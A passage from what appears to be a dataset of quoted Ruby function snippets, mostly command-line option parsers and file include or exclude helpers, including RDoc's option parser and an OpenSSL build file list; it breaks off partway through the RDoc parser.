"def getArguments\n\n\t# Parse the arguments\n\ttheArgs = { :clang => false,\n\t\t\t\t:rewrite => false,\n\t\t\t\t:help => false,\n\t\t\t\t:paths => [],\n\t\t\t\t:exclude => [] }\n\n\ttheParser = OptionParser.new do |opts|\n\t\topts.banner = \"Usage:\\n rn-format [--help] [--clang] [--rewrite] [--exclude=PATH] PATH [PATH...]\";\n\t\topts.separator \"\";\n\t\topts.separator \"Reformat any source files within the supplied paths,\";\n\t\topts.separator \"displaying the results to standard output.\";\n\t\topts.separator \"\";\n\t\topts.separator \"Options:\";\n\n\t\topts.on('--clang',\t\t\t\t\t\t'Show raw clang-format output') do\n\t\t\ttheArgs[:clang] = true;\n\t\tend\n\n\t\topts.on('--rewrite',\t\t\t\t\t'Rewrite files in-place') do\n\t\t\ttheArgs[:rewrite] = true;\n\t\tend\n\n\t\topts.on('--exclude=PATH',\t\t\t\t'Exclude a path') do |thePath|\n\t\t\ttheArgs[:exclude] << File.expand_path(thePath);\n\t\tend\n\n\t\topts.on('--help',\t\t\t\t\t\t'Show the help') do\n\t\t\ttheArgs[:help] = true;\n\t\tend\n\tend\n\n\ttheParser.parse!;\n\ttheArgs[:paths] = ARGV;\n\n\n\n\t# Show the help\n\tif (theArgs[:help] || theArgs[:paths].empty?)\n\t\tputs theParser.help();\n\t\texit(false);\n\tend\n\t\n\treturn theArgs;\n\nend",
"def main\n arg_parser=GetoptLong.new\n arg_parser.set_options(\n [\"-e\", \"--exclude\", GetoptLong::REQUIRED_ARGUMENT],\n [\"-i\", \"--include\", GetoptLong::REQUIRED_ARGUMENT],\n [\"-h\", \"--headers\", GetoptLong::NO_ARGUMENT],\n [\"-u\", \"--usage\", GetoptLong::NO_ARGUMENT])\n\n arg_parser.each do |opt, arg|\n begin\n case opt\n when \"-u\"\n usage()\n exit(0);\n when \"-h\"\n printHeader\n when \"-i\"\n $includes.push(arg)\n when \"-e\"\n $excludes.push(arg)\n end\n rescue => err; puts err; break;\n end\n end\n\n # after all args if we still don't have a directory then show usage\n if (ARGV.length != 1)\n usage();\n end\n\n # convert strings to regexs once, rather than during filtering loop\n $excludes.collect! {|str| Regexp.new(str)}\n $includes.collect! {|str| Regexp.new(str)}\n\n processTags(getFiles(ARGV.shift))\n return\nend",
"def parse_files(options)\n \n file_info = []\n\n files = options.files\n files = [\".\"] if files.empty?\n\n file_list = normalized_file_list(options, files, true)\n\n file_list.each do |fn|\n $stderr.printf(\"\\n%35s: \", File.basename(fn)) unless options.quiet\n \n content = File.open(fn, \"r\") {|f| f.read}\n\n top_level = TopLevel.new(fn)\n parser = ParserFactory.parser_for(top_level, fn, content, options, @stats)\n file_info << parser.scan\n @stats.num_files += 1\n end\n\n file_info\n end",
"def include_options\n { include: parsed_associations || [], methods: parsed_methods || [] }\n end",
"def parse(args)\n @options = {}\n @options[:command] = :scan # Default command is to scan for lints\n\n OptionParser.new do |parser|\n parser.banner = \"Usage: #{@application.executable_name} [options] [file1, file2, ...]\"\n\n add_linter_options parser\n add_file_options parser\n add_misc_options parser\n add_info_options parser\n end.parse!(args)\n\n # Any remaining arguments are assumed to be files that should be linted\n @options[:included_paths] = args\n\n @options\n rescue OptionParser::InvalidOption => ex\n raise InvalidCliOptionError,\n \"#{ex.message}\\nRun `#{@application.executable_name} --help` to \" \\\n 'see a list of available options.'\n end",
"def do_includes\n @content.scan(/rb_include_module\\s*\\(\\s*(\\w+?),\\s*(\\w+?)\\s*\\)/) do |c,m|\n next unless cls = @classes[c]\n m = @known_classes[m] || m\n\n comment = new_comment '', @top_level, :c\n incl = cls.add_include RDoc::Include.new(m, comment)\n incl.record_location @top_level\n end\n end",
"def definition_file_paths=(_arg0); end",
"def setup_options\n @parser.banner = BANNER\n\n @parser.on('-V', '--version', 'display version and exit') { show_version }\n @parser.on('-h', '--help', 'display help and exit') { show_help }\n @parser.on('-f', '--files=[file1.txt file2.txt ...]', Array, 'text files to read') { |o| @options.files = o }\n @parser.on('-n', '--number=NUM', Integer, 'number of results to show [default = 100]') do |n|\n @options.number = n\n end\n @parser.on('-v', '--verbose', 'verbose output') { @options.verbose = true }\n end",
"def header_files(target_name, &filter)\n target = target(target_name)\n\n header_files = target.headers_build_phase.files\n header_files = header_files.select(&filter) unless filter.nil?\n\n header_paths = header_files.map { |pathname|\n relative_path(pathname)\n }\n\n header_paths\n end",
"def find\r\n scanner = DirectoryScanner.new\r\n scanner.setBasedir(@context.root)\r\n scanner.setCaseSensitive(false)\r\n scanner.setIncludes(@includes.to_java :String) unless @includes.empty?\r\n scanner.setExcludes(@excludes.to_java :String) unless @excludes.empty?\r\n scanner.scan\r\n scanner.included_files.collect{|f| @context.filepath_from_root(f) }\r\n end",
"def set_include # separate function for readability since there are many files\n # @include = %w{ aes asn1 bf bio bn buffer camellia cast\n # cmac cms comp conf db des dh dsa\n # dso ec ecdh ecdsa engine err evp hmac\n # idea krb5 lhash md4 md5 mdc2 modes objects\n # ocsp pem pkcs12 pkcs7 pqueue rand rc2 rc4\n # ripemd rsa seed sha srp stack txt_db ts\n # ui whrlpool x509 x509v3 } # directories\n \n @include = %w{ crypto engines include }\n\n # set of files in libcrypto; since this set has a large number of elements, we\n # accumulate it in per-subdirectory increments\n #\n f_base = %w{ cryptlib cversion cpt_err\n ebcdic ex_data fips_ers\n mem mem_dbg o_time\n o_str o_dir o_fips\n o_init uid x86_64cpuid }\n\n f_objects = %w{ obj_dat obj_err obj_lib obj_xref o_names }\n\n f_md4 = %w{ md4_dgst md4_one }\n\n f_md5 = %w{ md5_dgst md5_one md5-x86_64 }\n\n f_sha = %w{ sha_dgst sha1dgst sha_one sha1_one\n sha256 sha512 sha1-x86_64 sha256-x86_64 sha512-x86_64 }\n\n f_mdc2 = %w{ mdc2dgst mdc2_one }\n\n f_hmac = %w{ hmac hm_ameth hm_pmeth }\n\n f_ripemd = %w{ rmd_dgst rmd_one }\n\n f_whrlpool = %w{ wp_dgst wp-x86_64 }\n\n f_des = %w{ set_key ecb_enc cbc_enc ecb3_enc cfb64enc\n cfb64ede cfb_enc ofb64ede enc_read enc_writ\n ofb64enc ofb_enc str2key pcbc_enc qud_cksm\n rand_key des_enc fcrypt_b fcrypt xcbc_enc\n rpc_enc cbc_cksm ede_cbcm_enc des_old des_old2\n read2pwd }\n\n f_aes = %w{ aes-x86_64 aes_cfb aes_ctr aes_ecb\n aes_ige aes_misc aes_ofb aes_wrap\n aesni-sha1-x86_64 aesni-x86_64 bsaes-x86_64 vpaes-x86_64 }\n\n f_rc2 = %w{ rc2_ecb rc2_skey rc2_cbc rc2cfb64 rc2ofb64 }\n\n f_rc4 = %w{ rc4-x86_64 rc4-md5-x86_64 rc4_utl }\n\n f_idea = %w{ i_cbc i_cfb64 i_ofb64 i_ecb i_skey }\n\n f_bf = %w{ bf_skey bf_ecb bf_enc bf_cfb64 bf_ofb64 }\n\n f_cast = %w{ c_skey c_ecb c_enc c_cfb64 c_ofb64 }\n\n f_camellia = %w{ cmll_ecb cmll_ofb cmll_cfb cmll_ctr cmll_utl\n cmll-x86_64 cmll_misc }\n\n f_seed = %w{ seed seed_ecb seed_cbc seed_cfb seed_ofb }\n\n f_modes = %w{ cbc128 ctr128 cts128 cfb128 ofb128 gcm128\n ccm128 xts128 ghash-x86_64 }\n\n f_bn = %w{ bn_add bn_blind bn_const bn_ctx\n bn_depr bn_div bn_err bn_exp\n bn_exp2 bn_gcd bn_gf2m bn_kron\n bn_lib bn_mod bn_mont bn_mpi\n bn_mul bn_nist bn_prime bn_print\n bn_rand bn_recp bn_shift bn_sqr\n bn_sqrt bn_word bn_x931p modexp512-x86_64\n x86_64-gcc x86_64-gf2m x86_64-mont x86_64-mont5 }\n\n f_ec = %w{ ec2_mult ec2_smpl ec_ameth ec_asn1\n ec_check ec_curve ec_cvt ec_err\n ec_key ec_lib ec_mult ec_pmeth\n ec_print eck_prn ecp_mont ecp_nist\n ecp_nistp224 ecp_nistp256 ecp_nistp521 ecp_nistputil\n ecp_oct ec2_oct ec_oct ecp_smpl }\n\n f_rsa = %w{ rsa_eay rsa_gen rsa_lib rsa_sign\n rsa_saos rsa_err rsa_pk1 rsa_ssl\n rsa_none rsa_oaep rsa_chk rsa_null\n rsa_pss rsa_x931 rsa_asn1 rsa_depr\n rsa_ameth rsa_prn rsa_pmeth rsa_crpt }\n\n f_dsa = %w{ dsa_gen dsa_key dsa_lib dsa_asn1\n dsa_vrf dsa_sign dsa_err dsa_ossl\n dsa_depr dsa_ameth dsa_pmeth dsa_prn }\n\n f_ecdsa = %w{ ecs_lib ecs_asn1 ecs_ossl ecs_sign ecs_vrf ecs_err }\n\n f_dh = %w{ dh_asn1 dh_gen dh_key dh_lib dh_check\n dh_err dh_depr dh_ameth dh_pmeth dh_prn }\n\n f_ecdh = %w{ ech_lib ech_ossl ech_key ech_err }\n\n f_dso = %w{ dso_dl dso_dlfcn dso_err dso_lib\n dso_null dso_openssl dso_win32 dso_vms\n dso_beos }\n\n f_engine = %w{ eng_err eng_lib eng_list eng_init\n eng_ctrl eng_table eng_pkey eng_fat\n eng_all tb_rsa tb_dsa tb_ecdsa\n tb_dh tb_ecdh tb_rand tb_store\n tb_cipher tb_digest tb_pkmeth tb_asnmth\n eng_openssl eng_cnf eng_dyn eng_cryptodev\n eng_rsax eng_rdrand }\n\n f_buffer = %w{ buffer buf_str buf_err }\n\n f_bio = %w{ bio_lib bio_cb bio_err bss_mem bss_null\n bss_fd bss_file bss_sock bss_conn bf_null\n bf_buff b_print b_dump b_sock bss_acpt\n bf_nbio bss_log bss_bio bss_dgram }\n\n f_stack = %w{ stack }\n\n f_lhash = %w{ lhash lh_stats }\n\n f_rand = %w{ md_rand randfile rand_lib rand_err\n rand_egd rand_win rand_unix rand_os2 rand_nw }\n\n f_err = %w{ err err_all err_prn }\n\n f_evp = %w{ encode digest evp_enc evp_key evp_acnf\n e_des e_bf e_idea e_des3 e_camellia\n e_rc4 e_aes names e_seed e_xcbc_d\n e_rc2 e_cast e_rc5 m_null m_md2\n m_md4 m_md5 m_sha m_sha1 m_wp\n m_dss m_dss1 m_mdc2 m_ripemd m_ecdsa\n p_open p_seal p_sign p_verify p_lib\n p_enc p_dec bio_md bio_b64 bio_enc\n evp_err e_null c_all c_allc c_alld\n evp_lib bio_ok evp_pkey evp_pbe p5_crpt\n p5_crpt2 e_old pmeth_lib pmeth_fn pmeth_gn\n m_sigver evp_fips e_aes_cbc_hmac_sha1 e_rc4_hmac_md5 }\n\n f_asn1 = %w{ a_object a_bitstr a_utctm a_gentm\n a_time a_int a_octet a_print\n a_type a_set a_dup a_d2i_fp\n a_i2d_fp a_enum a_utf8 a_sign\n a_digest a_verify a_mbstr a_strex\n x_algor x_val x_pubkey x_sig\n x_req x_attrib x_bignum x_long\n x_name x_x509 x_x509a x_crl\n x_info x_spki nsseq x_nx509\n d2i_pu d2i_pr i2d_pu i2d_pr\n t_req t_x509 t_x509a t_crl\n t_pkey t_spki t_bitst tasn_new\n tasn_fre tasn_enc tasn_dec tasn_utl\n tasn_typ tasn_prn ameth_lib f_int\n f_string n_pkey f_enum x_pkey\n a_bool x_exten bio_asn1 bio_ndef\n asn_mime asn1_gen asn1_par asn1_lib\n asn1_err a_bytes a_strnid evp_asn1\n asn_pack p5_pbe p5_pbev2 p8_pkey\n asn_moid }\n\n f_pem = %w{ pem_sign pem_seal pem_info pem_lib pem_all\n pem_err pem_x509 pem_xaux pem_oth pem_pk8\n pem_pkey pvkfmt }\n\n f_x509 = %w{ x509_def x509_d2 x509_r2x x509_cmp x509_obj\n x509_req x509spki x509_vfy x509_set x509cset\n x509rset x509_err x509name x509_v3 x509_ext\n x509_att x509type x509_lu x_all x509_txt\n x509_trs by_file by_dir x509_vpm }\n\n f_x509v3 = %w{ v3_bcons v3_bitst v3_conf v3_extku\n v3_ia5 v3_lib v3_prn v3_utl\n v3err v3_genn v3_alt v3_skey\n v3_akey v3_pku v3_int v3_enum\n v3_sxnet v3_cpols v3_crld v3_purp\n v3_info v3_ocsp v3_akeya v3_pmaps\n v3_pcons v3_ncons v3_pcia v3_pci\n pcy_cache pcy_node pcy_data pcy_map\n pcy_tree pcy_lib v3_asid v3_addr }\n\n f_conf = %w{ conf_err conf_lib conf_api conf_def\n conf_mod conf_mall conf_sap }\n\n f_txt_db = %w{ txt_db }\n\n f_pkcs7 = %w{ pk7_asn1 pk7_lib pkcs7err pk7_doit\n pk7_smime pk7_attr pk7_mime bio_pk7 }\n\n f_pkcs12 = %w{ p12_add p12_asn p12_attr p12_crpt\n p12_crt p12_decr p12_init p12_key\n p12_kiss p12_mutl p12_utl p12_npas\n pk12err p12_p8d p12_p8e }\n\n f_comp = %w{ comp_lib comp_err c_rle c_zlib }\n\n f_ocsp = %w{ ocsp_asn ocsp_ext ocsp_ht ocsp_lib ocsp_cl\n ocsp_srv ocsp_prn ocsp_vfy ocsp_err }\n\n f_ui = %w{ ui_err ui_lib ui_openssl ui_util ui_compat }\n\n f_krb5 = %w{ krb5_asn }\n\n f_cms = %w{ cms_lib cms_asn1 cms_att cms_io\n cms_smime cms_err cms_sd cms_dd\n cms_cd cms_env cms_enc cms_ess cms_pwri }\n\n f_pqueue = %w{ pqueue }\n\n f_ts = %w{ ts_err ts_req_utils ts_req_print ts_rsp_utils\n ts_rsp_print ts_rsp_sign ts_rsp_verify ts_verify_ctx\n ts_lib ts_conf ts_asn1 }\n\n f_srp = %w{ srp_lib srp_vfy }\n\n f_cmac = %w{ cmac cm_ameth cm_pmeth }\n\n # files in 'engines' linked in to libcrypt.a for static build but each is an\n # independent shared library for dynamic build\n #\n f_eng = %w{ e_4758cca e_aep e_atalla e_cswift e_gmp e_chil\n e_nuron e_sureware e_ubsec e_padlock e_capi }\n\n # files in engines/ccgost linked in to libcrypt.a for static build but are linked\n # into libgost.so for dynamic build\n #\n @f_ccgost = %w{ e_gost_err gost2001_keyx gost2001 gost89\n gost94_keyx gost_ameth gost_asn1 gost_crypt\n gost_ctl gost_eng gosthash gost_keywrap\n gost_md gost_params gost_pmeth gost_sign }\n\n f_engines = if :static == @build.link_type\n @f_ccgost + f_eng\n else\n f_eng\n end\n\n # concatenate all lists together, checking for duplicates\n all = [f_objects, f_md4, f_md5, f_sha, f_mdc2,\n f_hmac, f_ripemd, f_whrlpool, f_des, f_aes,\n f_rc2, f_rc4, f_idea, f_bf, f_cast,\n f_camellia, f_seed, f_modes, f_bn, f_ec,\n f_rsa, f_dsa, f_ecdsa, f_dh, f_ecdh,\n f_dso, f_engine, f_buffer, f_bio, f_stack,\n f_lhash, f_rand, f_err, f_evp, f_asn1,\n f_pem, f_x509, f_x509v3, f_conf, f_txt_db,\n f_pkcs7, f_pkcs12, f_comp, f_ocsp, f_ui,\n f_krb5, f_cms, f_pqueue, f_ts, f_srp,\n f_cmac, f_engines]\n @f_crypto = all.inject( f_base ){ |m, v| m += v }\n\n # check for duplicates\n cnt = @f_crypto.size\n @f_crypto.uniq!\n cnt -= @f_crypto.size\n raise \"Duplicates in @f_crypto: %d\" % cnt if cnt > 0\n\n end",
"def parse_arguments\n options = {}\n parser = OptionParser.new do |opts|\n opts.on(\"-d\", \"--dir DIR\", \"absolute or relative path of the directory\") do |arg|\n options[:dir] = arg\n end\n\n opts.on(\"-p\", \"--pattern PATTERN\", \"search pattern - can contain asterisk(*) as wildcard\") do |arg|\n options[:pattern] = arg\n end\n end\n parser.parse!\n [options, parser]\nend",
"def include(*args)\n options = Hash === args.last ? args.pop : nil\n files = to_artifacts(args)\n raise 'AchiveTask.include() values should not include nil' if files.include? nil\n\n if options.nil? || options.empty?\n @includes.include *files.flatten\n elsif options[:path]\n sans_path = options.reject { |k,v| k == :path }\n path(options[:path]).include *files + [sans_path]\n elsif options[:as]\n raise 'You can only use the :as option in combination with the :path option' unless options.size == 1\n raise 'You can only use one file with the :as option' unless files.size == 1\n include_as files.first.to_s, options[:as]\n elsif options[:from]\n raise 'You can only use the :from option in combination with the :path option' unless options.size == 1\n raise 'You cannot use the :from option with file names' unless files.empty?\n fail 'AchiveTask.include() :from value should not be nil' if [options[:from]].flatten.include? nil\n [options[:from]].flatten.each { |path| include_as path.to_s, '.' }\n elsif options[:merge]\n raise 'You can only use the :merge option in combination with the :path option' unless options.size == 1\n files.each { |file| merge file }\n else\n raise \"Unrecognized option #{options.keys.join(', ')}\"\n end\n self\n end",
"def parse_files(options)\n files = options.files\n files = [\".\"] if files.empty?\n\n file_list = normalized_file_list(options, files, true)\n\n return [] if file_list.empty?\n\n file_info = []\n width = file_list.map { |name| name.length }.max + 1\n\n file_list.each do |fn|\n $stderr.printf(\"\\n%*s: \", width, fn) unless options.quiet\n\n content = if RUBY_VERSION >= '1.9' then\n File.open(fn, \"r:ascii-8bit\") { |f| f.read }\n else\n File.read fn\n end\n\n if /coding:\\s*(\\S+)/ =~ content[/\\A(?:.*\\n){0,2}/]\n if enc = Encoding.find($1)\n content.force_encoding(enc)\n end\n end\n\n top_level = TopLevel.new(fn)\n parser = ParserFactory.parser_for(top_level, fn, content, options, @stats)\n file_info << parser.scan\n @stats.num_files += 1\n end\n\n file_info\n end",
"def process_arguments\n @args << \"-h\" if(@args.length < 1)\n \n opts_parse = OptionParser.new do |opts|\n opts.on('-f','--file FILE','use the following local file') {|file| @options.file = File.expand_path(file)}\n opts.on('-p','--parse PARSE',\"sets which set of sider files to download #{@@sections.join(\"|\")}\") {|parse| @options.parse = parse}\n opts.on('-d','--download','download the file to be parsed') {@options.download = true}\n opts.on('-o','--output DIR','set the output directory') {|directory| @options.output = File.expand_path(directory)}\n opts.on('-h','--help',\"prints the help\"){puts opts; exit!}\n end\n \n opts_parse.parse!(@args) rescue raise \"There was an error processing command line arguments use -h to see help\"\n end",
"def parse(header_file, to_file)\n includes = @includes.flatten.uniq.map {|i| \"-I#{i.chomp}\"}.join(\" \").chomp\n flags = @flags.flatten.join(\" \").chomp\n cmd = \"#{@exe} #{includes} #{flags} #{header_file} -fxml=#{to_file}\"\n raise \"Error executing gccxml command line: #{cmd}\" unless system(cmd)\n end",
"def cpp_files\n source_files(CPP_EXTENSIONS)\n end",
"def parse argv\n ignore_invalid = true\n\n argv.insert(0, *ENV['RDOCOPT'].split) if ENV['RDOCOPT']\n\n opts = OptionParser.new do |opt|\n @option_parser = opt\n opt.program_name = File.basename $0\n opt.version = RDoc::VERSION\n opt.release = nil\n opt.summary_indent = ' ' * 4\n opt.banner = <<-EOF\nUsage: #{opt.program_name} [options] [names...]\n\n Files are parsed, and the information they contain collected, before any\n output is produced. This allows cross references between all files to be\n resolved. If a name is a directory, it is traversed. If no names are\n specified, all Ruby files in the current directory (and subdirectories) are\n processed.\n\n How RDoc generates output depends on the output formatter being used, and on\n the options you give.\n\n Options can be specified via the RDOCOPT environment variable, which\n functions similar to the RUBYOPT environment variable for ruby.\n\n $ export RDOCOPT=\"--show-hash\"\n\n will make rdoc show hashes in method links by default. Command-line options\n always will override those in RDOCOPT.\n\n Available formatters:\n\n#{generator_descriptions}\n\n RDoc understands the following file formats:\n\n EOF\n\n parsers = Hash.new { |h,parser| h[parser] = [] }\n\n RDoc::Parser.parsers.each do |regexp, parser|\n parsers[parser.name.sub('RDoc::Parser::', '')] << regexp.source\n end\n\n parsers.sort.each do |parser, regexp|\n opt.banner += \" - #{parser}: #{regexp.join ', '}\\n\"\n end\n opt.banner += \" - TomDoc: Only in ruby files\\n\"\n\n opt.banner += \"\\n The following options are deprecated:\\n\\n\"\n\n name_length = DEPRECATED.keys.sort_by { |k| k.length }.last.length\n\n DEPRECATED.sort_by { |k,| k }.each do |name, reason|\n opt.banner += \" %*1$2$s %3$s\\n\" % [-name_length, name, reason]\n end\n\n opt.accept Template do |template|\n template_dir = template_dir_for template\n\n unless template_dir then\n $stderr.puts \"could not find template #{template}\"\n nil\n else\n [template, template_dir]\n end\n end\n\n opt.accept Directory do |directory|\n directory = File.expand_path directory\n\n raise OptionParser::InvalidArgument unless File.directory? directory\n\n directory\n end\n\n opt.accept Path do |path|\n path = File.expand_path path\n\n raise OptionParser::InvalidArgument unless File.exist? path\n\n path\n end\n\n opt.accept PathArray do |paths,|\n paths = if paths then\n paths.split(',').map { |d| d unless d.empty? }\n end\n\n paths.map do |path|\n path = File.expand_path path\n\n raise OptionParser::InvalidArgument unless File.exist? path\n\n path\n end\n end\n\n opt.separator nil\n opt.separator \"Parsing options:\"\n opt.separator nil\n\n opt.on(\"--encoding=ENCODING\", \"-e\", Encoding.list.map { |e| e.name },\n \"Specifies the output encoding. All files\",\n \"read will be converted to this encoding.\",\n \"The default encoding is UTF-8.\",\n \"--encoding is preferred over --charset\") do |value|\n @encoding = Encoding.find value\n @charset = @encoding.name # may not be valid value\n end\n\n opt.separator nil\n\n opt.on(\"--locale=NAME\",\n \"Specifies the output locale.\") do |value|\n @locale_name = value\n end\n\n opt.on(\"--locale-data-dir=DIR\",\n \"Specifies the directory where locale data live.\") do |value|\n @locale_dir = value\n end\n\n opt.separator nil\n\n opt.on(\"--all\", \"-a\",\n \"Synonym for --visibility=private.\") do |value|\n @visibility = :private\n end\n\n opt.separator nil\n\n opt.on(\"--exclude=PATTERN\", \"-x\", Regexp,\n \"Do not process files or directories\",\n \"matching PATTERN.\") do |value|\n @exclude << value\n end\n\n opt.separator nil\n\n opt.on(\"--extension=NEW=OLD\", \"-E\",\n \"Treat files ending with .new as if they\",\n \"ended with .old. Using '-E cgi=rb' will\",\n \"cause xxx.cgi to be parsed as a Ruby file.\") do |value|\n new, old = value.split(/=/, 2)\n\n unless new and old then\n raise OptionParser::InvalidArgument, \"Invalid parameter to '-E'\"\n end\n\n unless RDoc::Parser.alias_extension old, new then\n raise OptionParser::InvalidArgument, \"Unknown extension .#{old} to -E\"\n end\n end\n\n opt.separator nil\n\n opt.on(\"--[no-]force-update\", \"-U\",\n \"Forces rdoc to scan all sources even if\",\n \"no files are newer than the flag file.\") do |value|\n @force_update = value\n end\n\n opt.separator nil\n\n opt.on(\"--pipe\", \"-p\",\n \"Convert RDoc on stdin to HTML\") do\n @pipe = true\n end\n\n opt.separator nil\n\n opt.on(\"--tab-width=WIDTH\", \"-w\", Integer,\n \"Set the width of tab characters.\") do |value|\n raise OptionParser::InvalidArgument,\n \"#{value} is an invalid tab width\" if value <= 0\n @tab_width = value\n end\n\n opt.separator nil\n\n opt.on(\"--visibility=VISIBILITY\", \"-V\", RDoc::VISIBILITIES + [:nodoc],\n \"Minimum visibility to document a method.\",\n \"One of 'public', 'protected' (the default),\",\n \"'private' or 'nodoc' (show everything)\") do |value|\n @visibility = value\n end\n\n opt.separator nil\n\n markup_formats = RDoc::Text::MARKUP_FORMAT.keys.sort\n\n opt.on(\"--markup=MARKUP\", markup_formats,\n \"The markup format for the named files.\",\n \"The default is rdoc. Valid values are:\",\n markup_formats.join(', ')) do |value|\n @markup = value\n end\n\n opt.separator nil\n\n opt.on(\"--root=ROOT\", Directory,\n \"Root of the source tree documentation\",\n \"will be generated for. Set this when\",\n \"building documentation outside the\",\n \"source directory. Default is the\",\n \"current directory.\") do |root|\n @root = Pathname(root)\n end\n\n opt.separator nil\n\n opt.on(\"--page-dir=DIR\", Directory,\n \"Directory where guides, your FAQ or\",\n \"other pages not associated with a class\",\n \"live. Set this when you don't store\",\n \"such files at your project root.\",\n \"NOTE: Do not use the same file name in\",\n \"the page dir and the root of your project\") do |page_dir|\n @page_dir = page_dir\n end\n\n opt.separator nil\n opt.separator \"Common generator options:\"\n opt.separator nil\n\n opt.on(\"--force-output\", \"-O\",\n \"Forces rdoc to write the output files,\",\n \"even if the output directory exists\",\n \"and does not seem to have been created\",\n \"by rdoc.\") do |value|\n @force_output = value\n end\n\n opt.separator nil\n\n generator_text = @generators.keys.map { |name| \" #{name}\" }.sort\n\n opt.on(\"-f\", \"--fmt=FORMAT\", \"--format=FORMAT\", @generators.keys,\n \"Set the output formatter. One of:\", *generator_text) do |value|\n check_generator\n\n @generator_name = value.downcase\n setup_generator\n end\n\n opt.separator nil\n\n opt.on(\"--include=DIRECTORIES\", \"-i\", PathArray,\n \"Set (or add to) the list of directories to\",\n \"be searched when satisfying :include:\",\n \"requests. Can be used more than once.\") do |value|\n @rdoc_include.concat value.map { |dir| dir.strip }\n end\n\n opt.separator nil\n\n opt.on(\"--[no-]coverage-report=[LEVEL]\", \"--[no-]dcov\", \"-C\", Integer,\n \"Prints a report on undocumented items.\",\n \"Does not generate files.\") do |value|\n value = 0 if value.nil? # Integer converts -C to nil\n\n @coverage_report = value\n @force_update = true if value\n end\n\n opt.separator nil\n\n opt.on(\"--output=DIR\", \"--op\", \"-o\",\n \"Set the output directory.\") do |value|\n @op_dir = value\n end\n\n opt.separator nil\n\n opt.on(\"-d\",\n \"Deprecated --diagram option.\",\n \"Prevents firing debug mode\",\n \"with legacy invocation.\") do |value|\n end\n\n opt.separator nil\n opt.separator 'HTML generator options:'\n opt.separator nil\n\n opt.on(\"--charset=CHARSET\", \"-c\",\n \"Specifies the output HTML character-set.\",\n \"Use --encoding instead of --charset if\",\n \"available.\") do |value|\n @charset = value\n end\n\n opt.separator nil\n\n opt.on(\"--hyperlink-all\", \"-A\",\n \"Generate hyperlinks for all words that\",\n \"correspond to known methods, even if they\",\n \"do not start with '#' or '::' (legacy\",\n \"behavior).\") do |value|\n @hyperlink_all = value\n end\n\n opt.separator nil\n\n opt.on(\"--main=NAME\", \"-m\",\n \"NAME will be the initial page displayed.\") do |value|\n @main_page = value\n end\n\n opt.separator nil\n\n opt.on(\"--[no-]line-numbers\", \"-N\",\n \"Include line numbers in the source code.\",\n \"By default, only the number of the first\",\n \"line is displayed, in a leading comment.\") do |value|\n @line_numbers = value\n end\n\n opt.separator nil\n\n opt.on(\"--show-hash\", \"-H\",\n \"A name of the form #name in a comment is a\",\n \"possible hyperlink to an instance method\",\n \"name. When displayed, the '#' is removed\",\n \"unless this option is specified.\") do |value|\n @show_hash = value\n end\n\n opt.separator nil\n\n opt.on(\"--template=NAME\", \"-T\", Template,\n \"Set the template used when generating\",\n \"output. The default depends on the\",\n \"formatter used.\") do |(template, template_dir)|\n @template = template\n @template_dir = template_dir\n end\n\n opt.separator nil\n\n opt.on(\"--template-stylesheets=FILES\", PathArray,\n \"Set (or add to) the list of files to\",\n \"include with the html template.\") do |value|\n @template_stylesheets.concat value\n end\n\n opt.separator nil\n\n opt.on(\"--title=TITLE\", \"-t\",\n \"Set TITLE as the title for HTML output.\") do |value|\n @title = value\n end\n\n opt.separator nil\n\n opt.on(\"--copy-files=PATH\", Path,\n \"Specify a file or directory to copy static\",\n \"files from.\",\n \"If a file is given it will be copied into\",\n \"the output dir. If a directory is given the\",\n \"entire directory will be copied.\",\n \"You can use this multiple times\") do |value|\n @static_path << value\n end\n\n opt.separator nil\n\n opt.on(\"--webcvs=URL\", \"-W\",\n \"Specify a URL for linking to a web frontend\",\n \"to CVS. If the URL contains a '\\%s', the\",\n \"name of the current file will be\",\n \"substituted; if the URL doesn't contain a\",\n \"'\\%s', the filename will be appended to it.\") do |value|\n @webcvs = value\n end\n\n opt.separator nil\n opt.separator \"ri generator options:\"\n opt.separator nil\n\n opt.on(\"--ri\", \"-r\",\n \"Generate output for use by `ri`. The files\",\n \"are stored in the '.rdoc' directory under\",\n \"your home directory unless overridden by a\",\n \"subsequent --op parameter, so no special\",\n \"privileges are needed.\") do |value|\n check_generator\n\n @generator_name = \"ri\"\n @op_dir ||= RDoc::RI::Paths::HOMEDIR\n setup_generator\n end\n\n opt.separator nil\n\n opt.on(\"--ri-site\", \"-R\",\n \"Generate output for use by `ri`. The files\",\n \"are stored in a site-wide directory,\",\n \"making them accessible to others, so\",\n \"special privileges are needed.\") do |value|\n check_generator\n\n @generator_name = \"ri\"\n @op_dir = RDoc::RI::Paths.site_dir\n setup_generator\n end\n\n opt.separator nil\n opt.separator \"Generic options:\"\n opt.separator nil\n\n opt.on(\"--write-options\",\n \"Write .rdoc_options to the current\",\n \"directory with the given options. Not all\",\n \"options will be used. See RDoc::Options\",\n \"for details.\") do |value|\n @write_options = true\n end\n\n opt.separator nil\n\n opt.on(\"--[no-]dry-run\",\n \"Don't write any files\") do |value|\n @dry_run = value\n end\n\n opt.separator nil\n\n opt.on(\"-D\", \"--[no-]debug\",\n \"Displays lots on internal stuff.\") do |value|\n $DEBUG_RDOC = value\n end\n\n opt.separator nil\n\n opt.on(\"--[no-]ignore-invalid\",\n \"Ignore invalid options and continue\",\n \"(default true).\") do |value|\n ignore_invalid = value\n end\n\n opt.separator nil\n\n opt.on(\"--quiet\", \"-q\",\n \"Don't show progress as we parse.\") do |value|\n @verbosity = 0\n end\n\n opt.separator nil\n\n opt.on(\"--verbose\", \"-V\",\n \"Display extra progress as RDoc parses\") do |value|\n @verbosity = 2\n end\n\n opt.separator nil\n\n opt.on(\"--version\", \"-v\", \"print the version\") do\n puts opt.version\n exit\n end\n\n opt.separator nil\n\n opt.on(\"--help\", \"-h\", \"Display this help\") do\n RDoc::RDoc::GENERATORS.each_key do |generator|\n setup_generator generator\n end\n\n puts opt.help\n exit\n end\n\n opt.separator nil\n end\n\n setup_generator 'darkfish' if\n argv.grep(/\\A(-f|--fmt|--format|-r|-R|--ri|--ri-site)\\b/).empty?\n\n deprecated = []\n invalid = []\n\n begin\n opts.parse! argv\n rescue OptionParser::ParseError => e\n if DEPRECATED[e.args.first] then\n deprecated << e.args.first\n elsif %w[--format --ri -r --ri-site -R].include? e.args.first then\n raise\n else\n invalid << e.args.join(' ')\n end\n\n retry\n end\n\n unless @generator then\n @generator = RDoc::Generator::Darkfish\n @generator_name = 'darkfish'\n end\n\n if @pipe and not argv.empty? then\n @pipe = false\n invalid << '-p (with files)'\n end\n\n unless quiet then\n deprecated.each do |opt|\n $stderr.puts 